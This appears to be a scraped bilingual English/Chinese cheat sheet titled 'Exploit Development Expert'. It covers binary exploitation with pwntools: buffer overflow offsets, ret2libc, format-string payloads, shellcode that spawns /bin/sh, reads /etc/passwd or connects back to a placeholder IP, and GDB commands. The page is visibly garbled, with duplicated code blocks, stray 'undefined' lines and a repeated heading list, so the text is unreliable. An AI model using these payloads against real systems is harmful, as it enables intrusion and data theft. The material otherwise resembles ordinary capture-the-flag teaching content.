Exploit Development Expert

漏洞开发专家

Binary Exploitation Basics

二进制漏洞利用基础

Buffer Overflow

缓冲区溢出

python

from pwn import *

python

from pwn import *

Find offset

cyclic(200) # Generate pattern cyclic_find(0x61616166) # Find offset

Basic exploit

offset = 64 ret_addr = p64(0x401234) payload = b'A' * offset + ret_addr

With NX bypass (ret2libc)

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') system = libc.symbols['system'] bin_sh = next(libc.search(b'/bin/sh'))

undefined

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') system = libc.symbols['system'] bin_sh = next(libc.search(b'/bin/sh'))

undefined

Format String

格式化字符串

python

undefined

python

undefined

Read from stack

payload = b'%x.' * 20 payload = b'%7$s' # Read specific position

Write to address

payload = fmtstr_payload(offset, {target_addr: value})

undefined

payload = fmtstr_payload(offset, {target_addr: value})

undefined

Shellcode

python

undefined

python

undefined

Using pwntools

context.arch = 'amd64' shellcode = asm(shellcraft.sh())

Common shellcodes

shellcraft.sh() # /bin/sh shellcraft.cat('/etc/passwd') shellcraft.connect('IP', PORT)

undefined

shellcraft.sh() # /bin/sh shellcraft.cat('/etc/passwd') shellcraft.connect('IP', PORT)

undefined

Pwntools Essentials

Pwntools 核心用法

python

from pwn import *

python

from pwn import *

Setup

context.binary = ELF('./vuln') context.log_level = 'debug'

Connection

p = process('./vuln') # Local p = remote('ip', port) # Remote p = gdb.debug('./vuln') # With GDB

I/O

p.sendline(payload) p.recvuntil(b'>') data = p.recv(100)

Interactive

p.interactive()

undefined

p.interactive()

undefined

GDB Commands

GDB 常用命令

bash

gdb ./binary
> checksec                # Security features
> info functions          # List functions
> disas main              # Disassemble
> b *0x401234             # Breakpoint
> r < payload.txt         # Run with input
> x/20wx $rsp             # Examine stack

bash

gdb ./binary
> checksec                # Security features
> info functions          # List functions
> disas main              # Disassemble
> b *0x401234             # Breakpoint
> r < payload.txt         # Run with input
> x/20wx $rsp             # Examine stack

exploit-dev-expert

Original

Translation

Exploit Development Expert

漏洞开发专家

Binary Exploitation Basics

二进制漏洞利用基础

Buffer Overflow

缓冲区溢出

Find offset

Find offset

Basic exploit

Basic exploit

With NX bypass (ret2libc)

With NX bypass (ret2libc)

Format String

格式化字符串

Read from stack

Read from stack

Write to address

Write to address

Shellcode

Shellcode

Using pwntools

Using pwntools

Common shellcodes

Common shellcodes

Pwntools Essentials

Pwntools 核心用法

Setup

Setup

Connection

Connection

I/O

I/O

Interactive

Interactive

GDB Commands

GDB 常用命令